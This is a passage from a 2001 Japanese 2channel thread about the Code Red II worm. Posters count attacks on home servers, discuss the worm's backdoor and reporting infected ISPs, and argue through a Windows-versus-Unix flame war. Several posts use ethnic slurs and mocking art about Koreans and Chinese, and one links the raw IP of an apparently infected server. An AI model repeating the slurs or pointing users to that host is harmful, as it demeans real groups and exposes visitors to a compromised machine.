これ大丈夫なのかなぁ。spammer の仲間入り〜
とかいうことならないのかしら。
- 325 :名無しさん@お腹いっぱい。:2001/08/09(木) 12:29
- >>312
アメリカではウニクスといっていたな→Unix
というより、君のようなのはUnixユーザの評判おとすだけだよ。
信者の評判はしらんが。
CodeRed版なんだから、そのネタで話せ。
- 326 :325:2001/08/09(木) 12:30
- >>325
CodeRed版Linax。激しくつづり間違った。
- 327 :319:2001/08/09(木) 12:30
- ああでもテクニカルサポートに警告は出たなようやく…<Infosphere
でもあそこ見るぐらいの奴なら、とっくに対処してると思うぞ俺は…( ´Д`)
- 328 :名無しさん@お腹いっぱい。:2001/08/09(木) 12:30
- 厨房を無視できないアナタも厨房。以下電波は完全放置で。
- 329 :あげ」:2001/08/09(木) 12:32
- >>328
そんなあなたも厨房。。ぷぷぷぷぷっ
- 330 :名無しさん@お腹いっぱい。:2001/08/09(木) 12:33
- Linus氏もLinuxは好きな読み方でいいって言ってるんだから、別に何でもいいでしょ。
読み方でユーザを非難するのは間違い。
- 331 :ぷぷぷぷぷぷぷぷぷぷぷぷ:2001/08/09(木) 12:34
- ぷぷぷぷぷぷぷぷぷぷぷぷぷぷぷぷぷぷぷぷぷぷぷぷぷぷぷぷぷぷぷぷぷぷっ
- 332 :正解は:2001/08/09(木) 12:34
- Linuxリヌス
- 333 :名無しさん@お腹いっぱい。:2001/08/09(木) 12:39
- BSDって読んでもいいかな
- 334 :名無しさん@お腹いっぱい。:2001/08/09(木) 12:42
- >>319
長崎と岡山、たぶんウチに来てるやつと同じとこからですね。
あと、浦和からも来てる。<nttpc
- 335 :名無しさん@お腹いっぱい。:2001/08/09(木) 12:45
- ようやく落ち着いてきたみたい。
昨日2時間ほど繋いでたけどアタック一回のみ。
- 336 :名無しさん@お腹いっぱい。:2001/08/09(木) 12:46
- ノートン先生のウィルス定義更新間隔が短いよ
- 337 :あげ」:2001/08/09(木) 12:47
- SystemV
- 338 :名無しさん@お腹いっぱい。:2001/08/09(木) 12:47
- >>324
・Security Focusにもメール送るみたいだし(DoSになっちまう)
・いっぺん捕まえたのの重複チェックしてないみたいだし。
・人手がまるでなしで直接sendmailで送ってるし。
・PPPユーザかどうかフィルタしてないように思うし。
メール文面と確認用レポート作成して、手動で送信できるやつにしないといけないんでわ・・・
- 339 :名無しさん@お腹いっぱい。:2001/08/09(木) 12:48
- まだまだアクティブみたいよ。
さっき12:43の1分間だけで別々のところから3匹。
大体1〜2分に1匹くらいかな。
- 340 :あげ」:2001/08/09(木) 12:50
- IIS持ってるだけで加害者よ
ぷぷぷ、ちょっとは謙虚になれWinユーザども。
新参者め
- 341 :名無しさん@お腹いっぱい。:2001/08/09(木) 12:51
- 不思議な表記「CodeRedIIの被害は200件」
http://slashdot.jp/article.pl?sid=01/08/09/0112229&mode=thread&threshold=
報道しない方がマシだよ、これじゃ。頭悪いにも程がある。
- 342 :324:2001/08/09(木) 12:51
- >>338
だよねぇ。やっぱりこういうので騒ぎを増幅しないほうがいいよね。
- 343 :名無しさん@お腹いっぱい。:2001/08/09(木) 12:52
- 10分で20回。
- 344 :あげ」:2001/08/09(木) 12:53
- IIS持ってるだけで加害者よ
ぷぷぷ、ちょっとは謙虚になれWinユーザども。
新参者め
- 345 :名無しさん@お腹いっぱい。:2001/08/09(木) 12:54
- >>342
そうね。たぶん、Code RedよりもSMTPで多量の無駄トラヒックが・・・
- 346 :名無しさん@お腹いっぱい。:2001/08/09(木) 12:55
- coderedらしき、ファイル落ちて、ましたよ
- 347 :プププ:2001/08/09(木) 12:56
- >>344 今日の一言
「弱い犬厨ほどよく吠える」(藁
- 348 :名無しさん@お腹いっぱい。:2001/08/09(木) 12:58
-
>344
で ねぇねぇ かんせんしてるのめっけたら
どうあそぶの?
- 349 :あげ」:2001/08/09(木) 13:00
- Winしかいじれない奴の履歴
学歴:専門卒
言語歴:COBOL 7年
VB 2年
こんな奴が最近になって「インターネット」
に精通してるふりしてWinでサーバ立ててるん
だよな。うせろ。ぼけ。
- 350 :名無しさん@お腹いっぱい。:2001/08/09(木) 13:01
- Hackers loooooooooooooooooooooooooooooooooooooooooooooove Noodles
- 351 :名無しさん@お腹いっぱい。:2001/08/09(木) 13:02
- 二重ポストしてる時点で逝ってるしな(w
- 352 :名無しさん@お腹いっぱい。:2001/08/09(木) 13:02
- コボラー臭いな
- 353 :名無しさん@お腹いっぱい。:2001/08/09(木) 13:03
- Windowsの非難がしたい人はWin板にでも逝ってやってくださいな。
- 354 :名無しさん@お腹いっぱい。:2001/08/09(木) 13:04
- ていうか、Unixずっと使ってたけど、通用しなくてここでほえてるんでしょう。
真面目に仕事してたらいちいちWinにかみつかんよ。ぼやくだけ。
- 355 :あげ」:2001/08/09(木) 13:05
- ぼくは、2ちゃんねるのほうが
すこしはりょうしきのあるひとがおおいとおもったので
こっちにきました。
でもだめでした。
さよなら
- 356 :名無しさん@お腹いっぱい。:2001/08/09(木) 13:05
- 荒しは無視!
今日の昼までのログみたら国際色豊かすぎ(笑
ブラジルとかインドとか、やっぱりメール出すべきだろうか?
- 357 :名無しさん@お腹いっぱい。:2001/08/09(木) 13:05
- じゃっ、お元気で。
- 358 :名無しさん@お腹いっぱい。:2001/08/09(木) 13:06
- さよなら
- 359 :断末魔:2001/08/09(木) 13:07
- JALの発券システム 停止! 空港パニック。
CodeREDくさいなぁ〜〜〜。
現在調査中らしいです。駐機だらけになるやんけ!
ニュース注視セヨ
- 360 :あげ」:2001/08/09(木) 13:07
- >>354
なんで噛み付いているかというと
ただでさえMS嫌いなんだが、今回のCodeRedの件で
あまりにも対処しない馬鹿管理者がWinには多いと
いうことで切れた。
いい加減にせいよ。まじで。
おまえらのせいでまじで支障をきたしとるんじゃ。
- 361 :警察庁:2001/08/09(木) 13:07
- >>341
ホームページ書き換え事案に関する対策について
http://www.npa.go.jp/hightech/notice/notice.htm
これを元に書いたようだね。
内容的には、物足りないが、
警察庁としては、書いただけ誉めてあげよう。
これからは、2chを顧問にすることを提言しよう。
> 自己増殖型プログラム「Code Red2」(以下「当該ワーム」という。)については、
> 当庁では国内だけで被害を受けていると思われるサーバーを200箇所以上把握しており、
> 都道府県警察を通じて、被害サーバーの管理者への連絡及びその被害状況の確認について指示いたしました。
- 362 :名無しさん@お腹いっぱい。:2001/08/09(木) 13:08
- 恐らく上司に「Linuxはタダで構築できるのでLinuxにしましょう」と進言して、
「サポートはどうするんだ、バグはどうするんだ、お前が全てサポートできるのか」
とか言われて何も反論出来なくて、ここでストレス発散しているに10おしりコイン
- 363 :名無しさん@お腹いっぱい。:2001/08/09(木) 13:08
- >>359
Infoseekの速報では正午過ぎに復旧したって出てたけど・・・
- 364 :名無しさん@お腹いっぱい。:2001/08/09(木) 13:10
- /ヽ /ヽ ∧∧∧∧∧∧∧∧∧∧∧∧∧∧∧∧∧
/ ̄\ / ヽ__/ ヽ ノ
.r ┤ ト、 / \ / ※ \ くCodeRedにやられたニダ!日本に誠意有る
|. \_/ ヽ < ノ ̄| / 〉 < 謝罪と賠償を求めるニダ!
| __( ̄ | \ ├─┤ / ∨∨∨∨∨∨∨∨∨∨∨∨∨∨∨∨∨
| __)_ノ
ヽ___) ノ
- 365 :名無しさん@お腹いっぱい。:2001/08/09(木) 13:11
- >>361
ああ、ここも Windows2000 サーバーだけみたいな書き方
してるし(溜息
- 366 :名無しさん@お腹いっぱい。:2001/08/09(木) 13:11
- とりあえず、誰かは噛み付く先を間違っているほうに一票。>>360
ところで警視庁。>>361
「Windows2000Server上で動作する・・・」
困ったものだ・・・
- 367 :名無しさん@お腹いっぱい。:2001/08/09(木) 13:11
- >>360
Windows以外のユーザからみるとあなたの発言はとても不愉快なんですけど。
- 368 :名無しさん@お腹いっぱい。:2001/08/09(木) 13:12
- Windows2000で サーバ立てた = Windows 2000 Server。
オーマイ スパゲッティ
- 369 :名無しさん@お腹いっぱい。:2001/08/09(木) 13:12
- >>349
自分のチンコしかいじれない奴の性遍歴
学歴:オナニー
言語歴:オマンコ
せんずり履歴20年
こんな奴が最近になってセックス
に精通してるふりしてチンポ立ててるん
だよな。うせろ。ぼけ。
- 370 :あげ」:2001/08/09(木) 13:12
- >>362
MS信者のお決まり。ぷぷ。サポート。。ぷぷっ。
今だに案件でWinでクラサバやってる奴のお決まり。ぷぷ
- 371 :名無しさん@お腹いっぱい。:2001/08/09(木) 13:13
- >>349 の履歴
学歴:中学在学中
言語歴:VB 2年
C 一ヶ月
こんな奴が最近になって「犬糞(Turbo)」のインストールにやっと性交して、
精通現象は半年前のくせに女を経験してるふりして
Linuxでサーバ立ててるんだよな。
うせろ。犬厨。 (藁
- 372 :名無しさん@お腹いっぱい。:2001/08/09(木) 13:13
- >>363 日本放送協会でも逝ってたよ。
- 373 :あげ」:2001/08/09(木) 13:14
- >>360
そういうおまえはWinユーザ決定。だせっ。
- 374 :名無しさん@お腹いっぱい。:2001/08/09(木) 13:14
- 平日の真っ昼間から煽ってる夏厨君は無視の方向で
- 375 :365:2001/08/09(木) 13:14
- >>366 困ったものだね。
警視庁に電話で「誤解招くから書き直せゴルァ!」するの、
ちょっとドキドキ(藁
- 376 :???????????????B:2001/08/09(木) 13:14
- Windows2000Server...
KCchou senyou no customized na Windows?
- 377 :名無しさん@お腹いっぱい。:2001/08/09(木) 13:15
- 自分を爆撃? >>373
- 378 :名無しさん@お腹いっぱい。:2001/08/09(木) 13:15
- お帰りはこちら
http://yasai.2ch.net/test/read.cgi?bbs=win&key=995359813
- 379 :あげ」:2001/08/09(木) 13:16
- >>377
おれじゃないage
- 380 :え〜ん:2001/08/09(木) 13:18
- ただいま〜
あららら、板間違えたかと思ったyo
- 381 :名無しさん@お腹いっぱい。:2001/08/09(木) 13:18
- というわけで語り尽くしても語り尽くせぬ話題はみんなで
http://yasai.2ch.net/test/read.cgi?bbs=win&key=995359813 へGo!!
888くらい逝ってたから、スレ満杯にできるYo!きっと。
- 382 :名無しさん@お腹いっぱい。:2001/08/09(木) 13:19
- どう見てもこの⇒あげ」 ってヤツ
子供としか思えんのだが・・・
発言が頭悪そうだし。
- 383 :名無しさん@お腹いっぱい。:2001/08/09(木) 13:21
- Apacheぐらいは普通に書けるんだろ。
じゃなきゃUNIXは使えないよなぁ?
バグも自分でパッチ当てれるよな?
あげくん?
- 384 :あげ」:2001/08/09(木) 13:21
- しかし、素人でもないだろうに、よく半角カタカナ
が使えるよなあ。恥かしくないのかなあ。
こーゆー奴はメールにも半角カタカナ使ったりする
んだよな。はははぷぷぷ。
- 385 :名無しさん@お腹いっぱい。:2001/08/09(木) 13:22
- わしもビックリだYo! >>380
ハアハア君のほうが、楽しかったな(藁
- 386 :あげ」:2001/08/09(木) 13:23
- >>383
はあ?そんなこと聞くこと自体が厨だろ。
わりーけど、俺CCNP,RHCEなんだけど。
- 387 :え〜ん:2001/08/09(木) 13:24
- どうせならアパッシュダンス丸木君も呼んできてよ。
- 388 :名無しさん@お腹いっぱい。:2001/08/09(木) 13:25
- >>384
無知だねーSolarisでも標準で使えるしPC-Unixでも工夫すれば使えるよ。
犬だから知らなくてもしょうがないか。友達もいないみたいだね(プププ
- 389 :名無しさん@お腹いっぱい。:2001/08/09(木) 13:25
- 資格自慢厨房か。(プ
- 390 :名無しさん@お腹いっぱい。:2001/08/09(木) 13:26
- 結婚騒ぎはどうなったんだろ。→apach logクン。
- 391 :名無しさん@お腹いっぱい。:2001/08/09(木) 13:26
- 資格だけ自慢して、コミュニティに何を貢献したかを書かないなんて的外れもいいとこだな(プ
- 392 :名無しさん@お腹いっぱい。:2001/08/09(木) 13:27
- ていうか、もはや何の板だかまるでわからん。赤丸に世界を覆われてしまったに違いない。
- 393 :名無しさん@お腹いっぱい。:2001/08/09(木) 13:27
- >>390 そういえばそんな事があったな。
- 394 :あげ」:2001/08/09(木) 13:27
- >>388
「工夫すれば」.... プププWin厨
>>389
オマエトチガッテナー
- 395 :へ:2001/08/09(木) 13:27
- やった〜! ついに go.jp 系からきました。
- 396 :365:2001/08/09(木) 13:28
- 荒しは放置!
警視庁ハイテク相談窓口に電話で指摘しときました。
直してくれるかもしれません。
- 397 :名無しさん@お腹いっぱい。:2001/08/09(木) 13:28
- >>393
one night love affairだったのかも?
- 398 :名無しさん@お腹いっぱい。:2001/08/09(木) 13:28
- CCNA,RHCE<<ププププCisco厨&Redhat厨か救いようがねぇな(ププププ
- 399 :名無しさん@お腹いっぱい。:2001/08/09(木) 13:28
- 全体的に数は減ったけど
相変わらずカンコックとチャイニーヅがダントシ
ハンカク マンセー
- 400 :あげ」:2001/08/09(木) 13:29
- いや、まさかここでいろいろ言ってる奴って
CCNAもままならないんじゃないだろうな。
そんな奴を煽ってた俺age
- 401 :あげ」:2001/08/09(木) 13:30
- >>398
CCNPだっての
- 402 :名無しさん@お腹いっぱい。:2001/08/09(木) 13:31
- 専門厨房は置いとけや。
- 403 :名無しさん@お腹いっぱい。:2001/08/09(木) 13:31
- 2chぐらいでしか自己を主張できる場面がないのね>あげ
- 404 :名無しさん@お腹いっぱい。:2001/08/09(木) 13:31
- >>396
電話で指摘とは・・・
さすが
- 405 :名無しさん@お腹いっぱい。:2001/08/09(木) 13:31
- 関係ないんだが昔高校の自販機にあげくりというパンがあった。
今は無いらしい。
あのパッケージにノスタルジーを感じる俺ももう若くないな…。
- 406 :名無しさん@お腹いっぱい。:2001/08/09(木) 13:32
- 今日の「しみじみクン」の感想が楽しみカモ
- 407 :名無しさん@お腹いっぱい。:2001/08/09(木) 13:32
- こんな時間に書いてる管理者は夏厨
- 408 :あげ」:2001/08/09(木) 13:33
- >>403
オマエモナー
- 409 :名無しさん@お腹いっぱい。:2001/08/09(木) 13:34
- >>397 一夏の恋も悪かないさ…( ´Д`)
- 410 :あげ」:2001/08/09(木) 13:34
- >>407
オマエモナー。
- 411 :名無しさん@お腹いっぱい。:2001/08/09(木) 13:34
- あげ君、自慢以外に会話の内容が薄くてさびしいので、せっかくだから去るまえに
自己紹介フルにお願いします。
- 412 :あげ」:2001/08/09(木) 13:35
- >>411
ばーか
- 413 :名無しさん@お腹いっぱい。:2001/08/09(木) 13:35
- http://211.240.51.236/
- 414 :名無しさん@お腹いっぱい。:2001/08/09(木) 13:36
- 自宅サーバに多少のアクセスがあった程度で、
いちいちプロバイダにゴルァしてる奴とかカコワルイ
>>319トカ
- 415 :名無しさん@お腹いっぱい。:2001/08/09(木) 13:36
- しかし、asahi.com がちーっとも報道しないのは、あれかね?
やっぱり朝日だから?
- 416 :名無しさん@お腹いっぱい。:2001/08/09(木) 13:36
- >>413
ブラクラ反対
- 417 :名無しさん@お腹いっぱい。:2001/08/09(木) 13:38
- しかしsageで書いても書かんでも結局このスレが一番上ってのは
- 418 :名無しさん@お腹いっぱい。:2001/08/09(木) 13:38
- >>416
ブラクラじゃなくてCodeRedに感染したサーバ
- 419 :名無しさん@お腹いっぱい。:2001/08/09(木) 13:38
- >>375
確かに連絡窓口が電話しかないことをお詫びいたします。
ご連絡は、各地方毎に電話番号がありますので、中国の方は中国へ、ブラジルの方はブラジルの方へお電話ください。
情報が中央に届くまで大変お時間がかかりますので、しばらくお待ちください。
- 420 :しかし:2001/08/09(木) 13:38
- あの国は本当に迷惑だな。
- 421 :納得:2001/08/09(木) 13:39
- 赤帽厨だったか、やっぱりな。
- 422 :名無しさん@お腹いっぱい。:2001/08/09(木) 13:39
- >>414
多少じゃないんだけど…
ログチェックしてみぃ。
- 423 :名無しさん@Emacs:2001/08/09(木) 13:40
- エ-ン マタ-リスレ ダタノニ
- 424 :319:2001/08/09(木) 13:40
- >>414 カコワルクテゴメソ。
- 425 :名無しさん@お腹いっぱい。:2001/08/09(木) 13:40
- >>413
から落ちてくるものってなに?
- 426 :名無しさん@お腹いっぱい。:2001/08/09(木) 13:40
- >>418
なんだ、なんかダウンロードさせられたが、ただの壊れページだった(藁
- 427 :役得:2001/08/09(木) 13:41
- >>414はログチェックのしかたさえ分からないに一票!
- 428 :あげ」:2001/08/09(木) 13:41
- >>421
ちゃうでーー。俺はSlackやでーー。
他にLinux周りにメジャーな資格がないから取っただけやでー。
- 429 :名無しさん@お腹いっぱい。:2001/08/09(木) 13:44
- 319 じゃないけど、
>>414
うちが管理してるネットワークで、無駄トラフィックによる迷惑受け
まくりだから焼け石に水なことは判ってるが1つ1つツブしてるのよ。
偽善者気取りでやってるわけじゃないよ。マジで。
- 430 :名無しさん@お腹いっぱい。:2001/08/09(木) 13:45
- 本当に、お疲れ様です。 >>429
- 431 :名無しさん@お腹いっぱい。:2001/08/09(木) 13:46
- >>428 プログラミングの資格は持ってないの?
- 432 :名無しさん@お腹いっぱい。:2001/08/09(木) 13:47
- もう相手にしない方がいいって・・・
- 433 :名無しさん@お腹いっぱい。:2001/08/09(木) 13:47
- >>431
プログラミングの資格って、いいのあるの?
会社が言うんでしょうがなく情報処理1種・2種うけたけど、あれ通らないようでは・・
- 434 :名無しさん@お腹いっぱい。:2001/08/09(木) 13:48
- >>431 そろそろお帰りいただこうよ
- 435 :その1:2001/08/09(木) 13:48
- >>423
スマソ
- 436 :あげ」:2001/08/09(木) 13:49
- >>431
もってませーん。
仕事戻る。また後で煽ってあげるね。ばいばい
- 437 :名無しさん@お腹いっぱい。:2001/08/09(木) 13:51
- / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
| 反応速度が「電子レベルか?」ってやつ結構いますよね
\__ __________
∨
∧_∧ ∧_∧ / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
( ・∀・) (´∀` ) < そのわりに無駄な処理かましてるけどな。
( つ )つ□ □ ⊂( ) |
┃レ __ | ̄ ̄ ̄ ̄ | .___ノ┃ \__________
┗━┳┳\ | ̄ ̄ ̄ ̄| ./━┳┳┛
┃┃ |_____| .┃┃ さ、仕事しましょう。
- 438 :その1:2001/08/09(木) 13:54
- ファイルの存在を確認するにチェック入れた状態でCodeRedScaner掛けたら、
脆弱性は無いと判断されたのですが。
- 439 :名無しさん@お腹いっぱい。:2001/08/09(木) 13:55
- で??>>438
- 440 :その1:2001/08/09(木) 13:57
- (´Д`)ガーン
- 441 :名無しさん@お腹いっぱい。:2001/08/09(木) 13:58
- >>438-440 ワラタ
- 442 :431:2001/08/09(木) 14:05
- >>434 名スレ汚してスマソ。こんどきても無視します。
- 443 :名無しさん@お腹いっぱい。:2001/08/09(木) 14:07
- 同意
- 444 :あげ」:2001/08/09(木) 14:11
- >>442
名スレ、、、ぷぷぷっ
Win厨しかいないのに。。。。。
- 445 :名無しさん@お腹いっぱい。:2001/08/09(木) 14:15
- 日経の記事読んでたんだけど、警視庁は全国の都道府県警を通じて、
感染の確認と、ワームの除去を行うように指導する。って書いてあった。
ワームに捕まると警察から連絡が来るのかなぁ?
と言うことで、警察から連絡有った人詳細UPきぼーん
- 446 :あげ」:2001/08/09(木) 14:16
- 今回のCodeRedの件でびっくりしたこと。
・Winサーバが日本にあまりに多いこと。
・Winサーバ管理者は無知が多いので被害が増大してい
ること。これに彼らは気づいていないこと。
・Winサーバを立てても悪びれもしない人があまりに多い
こと。
・Winは新参者のくせにでかい態度を取る輩が多いこと。
Winがインターネットに参入しなかったら。
・UNIX管理者は最新の注意を払う人が多いので、CodeRedと
同等のウイルスが発生しても、ここまで広がらなかったは
ず。
・馬鹿な常識が蔓延しなかったはず。
- 447 :名無しさん@お腹いっぱい。:2001/08/09(木) 14:18
- 警察はどやって調べんの?
- 448 :名無しさん@お腹いっぱい。:2001/08/09(木) 14:21
- >>447
そう。それが僕も疑問。
ワームに感染しているホストは、簡単に分かるからその後だよね。
プロバイダーの名簿とかを入手するのかなぁ?
警察官が一軒一軒、サービスゥとパッチもって自宅訪ねてきたら
笑えるなぁと思って。念のため感染されておこうかなぁとか思った。
- 449 :名無しさん@お腹いっぱい。:2001/08/09(木) 14:21
-
日本はIT後進国なので、Windows でインターネットにサーバ
たてて実用になると思っている人が多いのです。
- 450 :名無しさん@お腹いっぱい。:2001/08/09(木) 14:24
- 警察は予防はしないはず。犯人探すだけでせいいっぱいでは。
Code Redイイ ってどこの人が作ったんだろね?
- 451 :名無しさん@お腹いっぱい。:2001/08/09(木) 14:24
- >>449 自虐するなよ。 ちょん。
- 452 :名無しさん@お腹いっぱい。:2001/08/09(木) 14:25
- アタック増大が夜間に多いので、むしろ、サーバでない奴が沢山感染していると
見られるが。
・Win2k proで訳もわからず全部入れた。
・ホムペチェックに使ってる。
全部削除か、Winやめれとは言わんからApacheに変更していただきたい今日この頃。
- 453 :名無しさん@お腹いっぱい。:2001/08/09(木) 14:28
- >>449 !( ゜∀゜)(゜∀゜)アdefault.nida?XXXXX…
- 454 :名無しさん@お腹いっぱい。:2001/08/09(木) 14:28
- >>449
実用になるよ。Unix系でもパッチをまめにあてたり
不要なデーモンを止めたりするのはセキュリティの常識。
今回の騒動はOSよりもサーバの管理人が悪いよ。
- 455 :名無しさん@お腹いっぱい。:2001/08/09(木) 14:29
- 漏れはなんの被害も受けていないな。
もっともーっと広まれって思っているよ。
みんな本気で静まってくれって思っているの?
- 456 :名無しさん@お腹いっぱい。:2001/08/09(木) 14:30
- 前から不思議なのだが、なぜnida。>>453
- 457 :名無しさん@お腹いっぱい。:2001/08/09(木) 14:31
- >>452
このワームの嫌なところは、感染者が被害に気が付きにくいところだぁね。
- 458 :名無しさん@お腹いっぱい。:2001/08/09(木) 14:32
- >>454
UnixでもWinでも、サーバ以外の用途で社会の窓が開いてるほうが問題で、
そっちは、MSなんとかしてほしい。
Windows Updateで出してくれないと、気づきさえしないユーザが多数・・・
- 459 :あげ」:2001/08/09(木) 14:35
- >>454
そんなこたーわかってんだよ。
ただ、Win管理者は「マウスカチッ」で
何でも出来ると思ってるネット厨が非常に
多いんだよ。
だから困り果ててるんだ、ったく。
- 460 :名無しさん@お腹いっぱい。:2001/08/09(木) 14:35
- >>455
更なる亜種の出現を期待していたんだが、全然駄目だね
中華流の再報復攻撃があってもよさそう
- 461 :名無しさん@お腹いっぱい。:2001/08/09(木) 14:35
- >>452
ダイアルアップユーザーへのこれ以上の拡大を止めるには、
プロバイダ側でユーザーの port80 宛てのパケットを暫く
ブロックするしかないかもね。あまり現実的じゃないけど。
あと、すでに感染してるテレホユーザーへの対処も難しいな。
夜中はプロバイダの担当者いないし、朝にログ送っても
プロバイダ側でダイアルアップのログと突き合わせて特定しなきゃ
ならんし。
- 462 :名無しさん@お腹いっぱい。:2001/08/09(木) 14:36
- >>455
静まれって思うよ。
ドアノブをひっきりなしにガチャガチャやられてる気分だよ。
- 463 :あげ」:2001/08/09(木) 14:37
- >>457
Win厨にはそういう管理者が多いだけだっての。
ウイザードがないと何も出来ないWin厨。
- 464 :名無しさん@お腹いっぱい。:2001/08/09(木) 14:38
- >>460
亜種の出現というより、そこらじゅうに転がってるバックドア
から変なもの注入してるヴァカが多数いるに1票
- 465 :名無しさん@お腹いっぱい。:2001/08/09(木) 14:38
- >>446
マジレスするのもナニだけど、
>Winがインターネットに参入しなかったら。
>・UNIX管理者は最新の注意を払う人が多いので、CodeRedと
> 同等のウイルスが発生しても、ここまで広がらなかったは
> ず。
>・馬鹿な常識が蔓延しなかったはず。
ダメなUNIX管理者が増えただけと思われ
- 466 :あげ」:2001/08/09(木) 14:40
- OSに手取り足取りWin厨。
- 467 :名無しさん@お腹いっぱい。:2001/08/09(木) 14:41
- 本日の逆引き
61で日本の奴はodn、dion、alpha-net、metaですね
特にodn.ad.jpは改善の兆しすら見えませぬ
- 468 :455:2001/08/09(木) 14:41
- >>462 そうですか。
うちでtcpdump -i ppp0でみてただけだけど、
たいした通信量じゃなかったのでどうでもいいかななんて感じた。
- 469 :あげ」:2001/08/09(木) 14:42
- >>465
ハア?
- 470 :名無しさん@お腹いっぱい。:2001/08/09(木) 14:46
- >>467
zaq wakwak bai ocn infoweb mctv
もあるよ。
- 471 :名無しさん@お腹いっぱい。:2001/08/09(木) 14:48
- なんか、エロ系から来るんだが…( ´Д`)
- 472 :名無しさん@お腹いっぱい。:2001/08/09(木) 14:50
- >>471 IPキボーン
- 473 :名無しさん@お腹いっぱい。:2001/08/09(木) 14:54
- >>469
大丈夫、あんたがダメとはいっとらん。
- 474 :名無しさん@お腹いっぱい。:2001/08/09(木) 14:57
- >>471 エロ系サイトはDQN IIS管理者(というか管理せず勃ちっぱなし鯖)多数と思われ。
- 475 :え〜ん:2001/08/09(木) 14:57
- あげさんは前スレ前々スレ読んでる?
- 476 :名無しさん@お腹いっぱい。:2001/08/09(木) 14:57
- Win厨とかあんま関係ないと思う。
結局のところセキュリティの予備知識なくWebサーバーおったてる管理者に
問題があるんだろ。
でもさ、「鯖置きませんか」なんて簡単に言ってくる鯖売り業者にも
問題あると思う。あいつら放り込んだらそれっきりだもんな。
せめて一通りの「具体的な」対策ぐらい教えていけよ。ッタク凸(-。-#)
- 477 :名無しさん@お腹いっぱい。:2001/08/09(木) 14:58
- ウイルス騒ぎがあるたびにzaqとodnは糞だと思う今日この頃。
- 478 :名無しさん@お腹いっぱい。:2001/08/09(木) 14:59
- 今のトコWindows NT4.0/2000のみ?
オレのMacは問題無し?
- 479 :名無しさん@お腹いっぱい。:2001/08/09(木) 14:59
- 午後3時までで728。
昨日の2倍のペースになってるんスけど
2個除いてすべてX
- 480 :名無しさん@お腹いっぱい。:2001/08/09(木) 15:00
- IIJ4Uにトップで警告が出たよん
- 481 :名無しさん@お腹いっぱい。:2001/08/09(木) 15:00
- >>469
仮にWinが広まらなかったら、
即席管理者がWinではなくUNIXに流れるだろってこと。
別にUNIXを使っていれば勝手にスキルが上がるわけでもあるまい。
- 482 :名無しさん@お腹いっぱい。:2001/08/09(木) 15:01
- >>474 なんとなく禿しく納得した。
- 483 :名無しさん@お腹いっぱい。:2001/08/09(木) 15:01
- >>474 今晩がたのしみ。ウププ、ボキシテキターヨ。
- 484 :名無しさん@お腹いっぱい。:2001/08/09(木) 15:01
- CodeRedUって、勝手に再起動かかるんだっけ?
再起動かかると、ゐ-るす消えてバックドアだけ残るんだっけ?
バックドアはどーでもいいから、早く止んで欲しいわこの無駄とらひっく。全く。
- 485 :名無しさん@お腹いっぱい。:2001/08/09(木) 15:05
- >>484 そのとおりだけど、何度でも罹患すると思われ。
なんか、そのむかしシグネチャが長いだけで帯域の無駄と言われたご時世
に比べれば平和な気もするけど、ISDNで業務サバの人あはれ・・・
- 486 :あげ」:2001/08/09(木) 15:05
- >>475
新参者です。ぷぷp
- 487 :え〜ん:2001/08/09(木) 15:06
- ここでマジになるのもなんだけどコードレッド飼ってるやつは
サーバー管理者とはかぎらんだろ。
フロントページ使ってるやつも危ないよなんだから。
- 488 :名無しさん@お腹いっぱい。:2001/08/09(木) 15:07
- >>484
常駐していたのは消えても、あっという間に再感染するよ。
- 489 :あげ」:2001/08/09(木) 15:07
- >>481
Roger
- 490 :名無しさん@お腹いっぱい。:2001/08/09(木) 15:09
- >>486 つうわけで、Win管理者以外も結構多数なスレである昨今。
どうせ居着くなら、まったりしていただきたい今日この頃。
- 491 :名無しさん@お腹いっぱい。:2001/08/09(木) 15:09
- >>489 ロジャーといえば、首がニュ〜っと・・・
- 492 :え〜ん:2001/08/09(木) 15:11
- だけど鬱だよな、メールチェックとお気に入りのサイトチェック
してるだけのやつから、攻撃されるんだもの。
- 493 :名無しさん@お腹いっぱい。:2001/08/09(木) 15:11
- >>484
中国語版では 48h, それ以外は 24h でリブートして
バックドアだけ残る。その状態だとまだ再感染するので、
今やってきてる奴はすでに何周かしてるのが結構いると思われ
あと、9月30日でばら撒き停止に入るらしいです。
亜種出てきたらおしまいだけど。
- 494 :名無しさん@お腹いっぱい。:2001/08/09(木) 15:12
- >>486
なんつーか、前スレとかも読まない人に、こーゆーこと言われても…
人の振りみて我が振り直せよ。
- 495 :あげ」:2001/08/09(木) 15:13
- >>490
基本はWin管理者駆逐
- 496 :名無しさん@お腹いっぱい。:2001/08/09(木) 15:13
- >>485
>>488
>>493
そういや忘れてたわ。
全社全マシンの対策に追われて疲れてたのかも。
社内感染したら氏ぬしね。外は最初から問題なしだし。
ありがとね。
そーいや、某大手IT企業が社内感染したって噂聞いたけど。
- 497 :え〜ん:2001/08/09(木) 15:15
- >>493
>あと、9月30日でばら撒き停止に入るらしいです。
この情報ってディスアッセンブルかなんかで調べたのかな?
よく分かるな〜と思って
- 498 :歴史の時間:2001/08/09(木) 15:16
- Code Red って最初チャソコロがまいて、
それみたアメコウがコード改良してまいたら、
予想に反してチョソで爆発的大人気ってことでいいのかな?
- 499 :名無し:2001/08/09(木) 15:16
- >>493
誰かが エシュロン キーワード ワームを 今ごろしこしこ作っていると 思われ。
- 500 :名無しさん@お腹いっぱい。:2001/08/09(木) 15:18
- >>496 社員のダイアルアップあたりから拾ったんじゃないかなあ?
- 501 :名無しさん@お腹いっぱい。:2001/08/09(木) 15:19
- >>497 スクリプト厨房が4バイト書き換えただけでどうにでもなるから鬱っす・・・
- 502 :名無しさん@お腹いっぱい。:2001/08/09(木) 15:19
- >>498
んなの同意求められてもワカラン(笑
ただ、中国側は「わが国内で作られたにしては高度すぎるので多分違う」
とか言ってたというのをどっかで見たけど。ソース忘れゴメソ
- 503 :名無しさん@お腹いっぱい。:2001/08/09(木) 15:21
- >>498 言語設定見て、中国ねらいのつもりが韓国で炸裂。
- 504 :え〜ん:2001/08/09(木) 15:22
- >>501
エ ヘ!ク Lヘ!瑞This program must be run under Win32
$7 PE L ^B* 氏
これこのことかい?
- 505 :名無しさん@お腹いっぱい。:2001/08/09(木) 15:22
- >>502
たぶんこれ
http://www.zdnet.co.jp/news/0108/02/e_vamosi.html
- 506 :名無しさん@お腹いっぱい。:2001/08/09(木) 15:22
- >>498
